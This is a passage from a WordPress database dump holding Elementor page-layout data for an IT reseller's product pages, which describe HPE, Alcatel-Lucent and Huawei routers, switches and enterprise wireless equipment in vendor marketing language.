id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"244\\\" height=\\\"184\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"&nbsp;\\n&nbsp;\\n<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p>\\n<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8611,3656,'_elementor_version','2.7.4'),(8612,3657,'_edit_lock','1571989042:1'),(8608,3656,'_edit_last','1'),(8459,1534,'_elementor_edit_mode','builder'),(8460,1534,'_elementor_template_type','post'),(8461,1534,'_elementor_version','2.5.14'),(8468,3641,'_wp_page_template','template-fullwidth.php'),(8469,3641,'_elementor_edit_mode','builder'),(8470,3641,'_elementor_template_type','post'),(8471,3641,'_elementor_version','2.5.14'),(8472,3641,'_elementor_data','[{\"id\":\"af265c5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"dcd2f65\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c0afcf6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Enterprise Wireless<\\/h2><h4>Intelligent Wireless Connections, Building Digital Industries<\\/h4>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e4c641\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0a8b7c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":38.288,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"d213159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>What Are the Benefits of the Enterprise Wireless?<\\/strong><\\/h3><ul><li>Multiple Services on One Network<\\/li><li>Industrial-Grade Reliability<\\/li><li>Access Anytime and Anywhere<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1026f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":61.712},\"elements\":[{\"id\":\"d302fa2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: left;\\\">Huawei uses leading 4.5G wireless technologies and its in-depth understanding of industry customers to provide the eLTE Multimedia Critical Communications System (MCCS) Solution, the 4.5G-based eLTE narrowband and broadband integrated wireless IoT solution, and the GSM-R solution for a wide range of services, such as narrowband, broadband, voice, multimedia, fixed, and mobile. Huawei also builds a professional and reliable mobile communications platform for diverse industry applications, such as professional trunking voice, wireless video surveillance, broadband data access, mass data collection, railway wireless dispatching, and high-speed train control.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5306d2a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"252d9e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ddcfc15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"title\\\" style=\\\"text-align: center;\\\">Enterprise Routers<\\/h2><div class=\\\"sub-title\\\"><p style=\\\"text-align: center;\\\">Routers with large-capacity, high-reliability, easy O&amp;M, and low power consumption help enterprises in various industries to quickly achieve digital transformation.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fa15163\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"4dfdb57\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b1eec00\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">NE Series Routers<\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>Highest performance routers to power innovative enterprise applications from small to super huge scale. Carrier-grade reliability, flexible modular architecture, and energy-efficient technologies add up to great service at lowest TCO.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d09bf0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9dbfac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">ME60 Series<\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>2T hardware platform, providing 10G to 480G line cards (including 160G CGN line cards), supporting a maximum of 256K concurrent users and allowing 1,200 users to go online per second.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23f625e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f14b9c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">PTN 7900 Series<\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>The OptiX PTN 7900 NE is a new-generation high-capacity, high-bandwidth, and software-defined core device that supports smart services.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4fdaf04\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"c1e2534\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f28936f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">AR502 Series IoT Gateways<\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>The AR502 uses the built-in industrial-grade LTE module, and offers high bandwidth and low-latency wireless access. It provides various local interfaces and applies to a number of IoT fields, such as smart grid, smart city, and smart building.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eda219b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1df5ae0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">AR1200 Series Enterprise Routers<\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>The AR1200 is a multi-service router designed for Small and Medium-sized Enterprises (SMEs). It provides Internet access, dedicated line access, and voice, security, and wireless functions. It can be deployed at the egress of small and medium-sized campus networks and the headquarters and branches of SMEs.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91bd5a6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"64c641b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4e5f077\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6f707b6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"09dccae\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e45fa25\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why Huawei Routers?\",\"align\":\"center\",\"title_color\":\"#262626\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f09523f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"50a7aa9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4a10ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Leading Market Share<\\/strong><\\/h3><p>Huawei routers ranked No. 1 in China and No. 2 in the global market, and 70% of carriers and enterprise network NAs use them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fa6a80b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d96c0e8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Strong Development Capabilities<\\/strong><\\/h3><p>Huawei is a leader and outstanding contributor in the IP standards field. Its proprietary Solar chipset had large-scale commercial use on the live network in 2013 and more than 3 million chips were delivered, and the Huawei-proprietary VRP software is the culmination of 17 years of innovation.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4a8f8dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c899bf8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Award Winning Products<\\/strong><\\/h3><p>Huawei routers have won multiple international awards, including SDN-VDC InfoVision award and Japan\\u2019s Interop gold award, and they have obtained certification from multiple third-party authoritative organizations worldwide.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9e84d8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5c29eb1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21fd9b2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f758119\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"e9f40c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"12c9961\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"title\\\" style=\\\"text-align: center;\\\">Switches<\\/h2><div class=\\\"sub-title\\\" style=\\\"text-align: center;\\\">For a wide variety of applications and network\\u00a0sizes, from\\u00a0cloud data centers to campus networks<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dc61304\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"b1ab896\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"79e3e82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Campus Switches<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>Huawei\\u2019s self-developed, innovative data center, campus, and carrier switch portfolios help accelerate your digital transformation.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17073bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"090de2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Data Center Switches<\\/strong><\\/h3><div class=\\\"txtbox mask-gradient\\\"><p>CloudEngine series switches offer carrier-grade reliability, virtualization support, iStack clustering, and Software-Defined Networking features for building and scaling data centers and campus networks. They provide versatility and resilient performance for server-based multimedia applications, Big Data analytics, and cloud computing.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f42fd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78ffde0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7e04b2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"59745dc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f5e0203\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c70ae6d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why Huawei Switches?\",\"align\":\"center\",\"title_color\":\"#262626\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a0d3196\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7ae93ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6c25356\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"txtbox mask-gradient\\\"><h3 class=\\\"sub-title\\\" style=\\\"text-align: center;\\\"><strong><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.0625rem;\\\">Diversified Products and Solutions<\\/span><\\/strong><\\/h3><\\/div><div><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><p>Huawei provides the most complete portfolio of data center network and campus products, supporting customers business requirements for digital transformation and enabling their rapid growth of virtualization, Big Data, and cloud services.<\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e2cc85e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4446ef9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Extensive Customer Cases<\\/strong><\\/h3><p>Huawei switches have been deployed for enterprises in more than 150 countries and are widely used in sectors such as finance, Internet, retail, education, manufacturing, and public services. Huawei\\u2019s data center network and wired and wireless convergence solutions are rated as Challenger and Visionary in Gartner\\u2019s Magic Quadrant, respectively.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4b8bf3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"de9899a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"txtbox mask-gradient\\\" style=\\\"text-align: center;\\\"><strong><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.0625rem;\\\">Many Global Channels and Localized Services<\\/span><\\/strong><\\/h3><div><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><p>Huawei switches support tens of thousands of channels and partners in 150 countries, providing innovative switch solutions in all industries and localized services.<\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"28d9a79\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d985467\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9410c6c\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93b9ac\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#f7f7f7\"},\"elements\":[{\"id\":\"7454910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb5f64a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"title\\\" style=\\\"text-align: center;\\\">Servers - Intelligent Computing<\\/h2><div class=\\\"sub-title\\\"><p style=\\\"text-align: center;\\\">Boundless Computing Inspires an Intelligent Digital 